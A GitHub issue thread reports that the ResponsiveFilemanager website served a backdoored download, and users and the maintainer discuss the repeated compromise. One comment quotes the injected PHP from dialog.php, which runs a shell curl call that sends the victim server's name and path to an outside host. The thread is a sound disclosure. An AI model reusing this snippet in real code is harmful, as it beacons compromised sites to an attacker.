### ISSUE TITLE
Hacked website

### ISSUE THREAD

**Issue by Maxime-J** [trippo/ResponsiveFilemanager#350]
Your website (http://www.responsivefilemanager.com/) certainly has been hacked.
The downloaded zip doesn't match with the one provided from this repository:
-there's extra code added in dialog.php line 85 that sends an email and creates an upload script
-there's the same upload script already present in the zip in the ico_dark folder

**Comment by trippo** [comment]
Thanks for this reporting i fixed now

**Comment by RedwingNZ** [comment]
Nice catch!
Seems that user was created 6 days ago, most likely for that very reason.
https://github.com/imlimited

**Comment by trippo** [comment]
I contacted GitHub to close this account

**Comment by Maxime-J** [comment]
That was quick.
Thanks!

**Comment by Maxime-J** [comment]
Same problem again,
website link has been changed to the same other repo (btw, the code have been slightly updated and the added script removed).

**Comment by Wrystell** [comment]
Confirm, the link from your site still download the hacked script.
In dialog.php line 94 theres a curl call that log the plugin site url and access key:
$loll = $_SERVER['SERVER_NAME'];
$ada = $_SERVER['PHP_SELF'];
$rand = rand(0,99);
$m = $loll.$ada.$rand;
$s = "Responsive Log ( ".$loll." ) aa";
$h = "From: ".$m." <ig@nyengg.id>";
$form = `curl -s --data "s=$s&m=$m&h=$h" https://goldgenie.com.dotasite.com/lul.php3`;
echo $form;

Maybe your site have some vulnerability

**Comment by trippo** [comment]
I re-changed but i must find where is the breach

**Comment by aris-kun** [comment]
Hacked again, please fix it soon, I need to read your documentations

**Comment by InfinityWebMe** [comment]
Hi, up the website code on github. So that we can help you :)

**Comment by trippo** [comment]
I migrate the site in another server because i continue received attach

**Comment by sashaptrw** [comment]
Hacked since?

**Comment by trippo** [comment]
the website was hacked for ten days lst year now it's fine.
